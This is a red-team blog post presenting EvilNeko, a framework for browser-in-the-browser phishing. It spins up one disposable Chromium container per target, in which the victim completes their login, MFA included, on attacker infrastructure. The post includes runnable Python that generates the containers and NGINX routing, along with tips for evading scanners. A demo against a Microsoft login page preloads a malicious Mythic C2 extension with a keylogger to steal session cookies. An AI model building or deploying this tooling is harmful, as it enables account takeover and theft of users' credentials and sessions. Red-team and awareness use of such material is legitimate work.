EvilNeko: Operationalizing Browser in the Browser Attacks
Browser in the Browser (BITB) attacks work by presenting a fully attacker-controlled browser environment to the user, which can mimic typical login flows. This subverts standard guidance such as "check the URL" and builds more trust between the target and the site they are interacting with. It also simplifies session theft: because the target performs the entire login, including any MFA prompt, inside a browser running on red team infrastructure, the authenticated session already lives there and no separate MFA bypass is required. When I first read about BITB phishing in mr.d0x's article, I was interested in exploring it further.
So far, most of the open source tooling I have found is focused on frontend templates for creating convincing phishing landing pages. I noticed a lack of projects focused on scaling these attacks beyond a single target/session and on the backend infrastructure needed to take advantage of those templates. I also tried tools like EvilNoVNC but wanted more automation, so I was inspired to start building.
EvilNeko
During my research I came across the neko project, which serves a browser from a container over WebRTC so that multiple users can interact with it. The project also has numerous customization options, so I thought it would be a good base for a BITB framework. EvilNeko was born.
The main issues I wanted to tackle with this project were:
- Allowing targeting of multiple users/sessions with one toolset
- Automating the creation of lures and the routing of traffic to multiple lures
- Providing options for BITB attacks to integrate with broader offensive workflows (as I will demo with Mythic)
- Creating tooling that can be easily modified to meet operational needs
EvilNeko is a command line Python tool that automates the creation and destruction of multiple disposable neko containers running Chromium via docker compose. Each container is named with a UUID so that each browser stays isolated to a specific target. EvilNeko then starts NGINX with a generated config and a light Flask backend that handles the routing logic to each container.

EvilNeko purposely does not ship with a built-in payload, but each container can be preloaded with a malicious Chrome extension to perform session hijacking and more.
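To make the per-target isolation concrete, here is an added example (not EvilNeko's own code) of a minimal lure registry in the same shape: one disposable neko container per lure, keyed by a UUID that doubles as the container name, a docker compose service and NGINX location generated for it, and a route resolver of the kind the Flask backend would call. It uses only the standard library so it runs offline; the image name, environment variables, mount paths, host port pool and the use of Chromium's managed policy to open the target URL are assumptions for illustration, and EvilNeko's real generator may differ.

```python
"""Added example (not EvilNeko's own code): a lure registry that allocates one
neko container per target and the NGINX/compose fragments that route to it.
Image name, env vars, mount paths and the port pool are assumptions."""
import json
import uuid
from dataclasses import dataclass, field

NEKO_IMAGE = "m1k1o/neko:chromium"   # assumption: upstream neko Chromium image
FIRST_PORT = 18080                   # assumption: start of the loopback port pool
LURES_DIR = "./lures"                # layout from the post (policies.json, extension/)


@dataclass
class Lure:
    lure_id: str      # UUID4; also the container name, so cleanup is a name lookup
    host_port: int    # loopback port that NGINX proxies to
    target_url: str   # page the browser opens for this target


@dataclass
class LureManager:
    target_url: str = ""
    next_port: int = FIRST_PORT
    lures: dict = field(default_factory=dict)   # lure_id -> Lure

    def set_url(self, url: str) -> str:
        """Equivalent of `set_url`; a bare host gets an https:// scheme."""
        if "://" not in url:
            url = "https://" + url
        self.target_url = url
        return url

    def create_lure(self) -> Lure:
        """Equivalent of one `create_lure`: a fresh UUID and its own port."""
        if not self.target_url:
            raise ValueError("call set_url before create_lure")
        lure = Lure(str(uuid.uuid4()), self.next_port, self.target_url)
        self.next_port += 1          # never reuse a port, even after destroy
        self.lures[lure.lure_id] = lure
        return lure

    def destroy_lure(self, lure_id: str) -> bool:
        return self.lures.pop(lure_id, None) is not None

    def chromium_policy(self) -> dict:
        """Managed Chromium policy (assumed mount) that opens the target URL on start."""
        return {"RestoreOnStartup": 4, "RestoreOnStartupURLs": [self.target_url]}

    def compose_service(self, lure: Lure) -> dict:
        return {
            "image": NEKO_IMAGE,
            "container_name": lure.lure_id,
            "shm_size": "2gb",
            # bind to loopback only: targets must come through NGINX
            "ports": [f"127.0.0.1:{lure.host_port}:8080"],
            "volumes": [
                f"{LURES_DIR}/policies.json:/etc/chromium/policies/managed/policies.json:ro",
                # assumption: the browser launch config loads the unpacked extension from here
                f"{LURES_DIR}/extension:/opt/extension:ro",
            ],
            "environment": {"NEKO_SCREEN": "1920x1080@30", "NEKO_ICELITE": "1"},
        }

    def compose_doc(self) -> dict:
        return {"services": {l.lure_id: self.compose_service(l) for l in self.lures.values()}}

    def compose_yaml(self) -> str:
        """JSON is a YAML subset, so this string is a valid docker-compose.yml."""
        return json.dumps(self.compose_doc(), indent=2)

    def nginx_config(self) -> str:
        """One location per lure; the Upgrade headers keep neko's WebSocket working."""
        blocks = []
        for l in self.lures.values():
            blocks.append(
                f"location /{l.lure_id}/ {{\n"
                f"    proxy_pass http://127.0.0.1:{l.host_port}/;\n"
                "    proxy_http_version 1.1;\n"
                "    proxy_set_header Upgrade $http_upgrade;\n"
                '    proxy_set_header Connection "upgrade";\n'
                "    proxy_set_header Host $host;\n"
                "}\n")
        return "".join(blocks)

    def resolve(self, path: str):
        """Backend routing: /<lure_id>/rest -> container URL, or None if unknown."""
        head, _, rest = path.lstrip("/").partition("/")
        try:
            lure = self.lures[str(uuid.UUID(head))]   # normalises case/braces
        except (ValueError, KeyError):
            return None
        return f"http://127.0.0.1:{lure.host_port}/{rest}"


if __name__ == "__main__":
    mgr = LureManager()
    mgr.set_url("login.microsoft.com")
    lure = mgr.create_lure()
    print(mgr.compose_yaml())
    print(mgr.nginx_config())
    print(mgr.resolve(f"/{lure.lure_id}/ws"))
```

Two details matter operationally: the port counter is never rewound, so destroying and recreating lures cannot hand a new target the port of a container that is still shutting down, and `resolve` rejects anything that does not parse as a UUID before touching the registry, so scanners hitting random paths get nothing back.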
Demo
After cloning the EvilNeko project and ensuring you have NGINX, Docker, docker-compose, and Flask installed, generate an unpacked Chrome extension. For this example we will use the Mythic C2 Leviathan agent. Ensure the folder is named "extension" and place it inside the lures folder like below:
lures
├── chromium.conf
├── extension
│   ├── icons
│   │   └── blank.png
│   ├── main.js
│   ├── manifest.json
│   └── utils
│       └── kl.js
└── policies.json
Then, run EvilNeko and set the URL that you want the containers to open to:
EvilNeko> set_url login.microsoft.com
Next, create a number of lures:
EvilNeko> create_lure 1
As soon as the container spins up, you will see the Mythic agent callback:

To confirm the extension is loaded, look in the Chromium instance hosted in the neko container:

You can now send a lure link to your phishing target and use the many features of this agent, such as stealing session cookies, taking screenshots, and more.
EvilNeko lets red teams easily spin up multiple container instances to emulate BITB attacks at scale. Support for malicious extensions allows EvilNeko to fit into existing red team stacks.
I did not focus on creating additional frontend templates, as there is already a lot of great content from others to use.
Conclusion
EvilNeko helps elevate red teams' ability to perform BITB attacks and, in turn, raises blue team awareness of these techniques. The technique is still powerful because it attacks user trust: users rely on traditional security awareness programs that teach strategies such as "check the URL." BITB is currently underutilized, and I hope this generates more interest in the technique. If you are interested in providing feedback or requesting features, hop over to my GitHub and open an issue. Thanks for reading!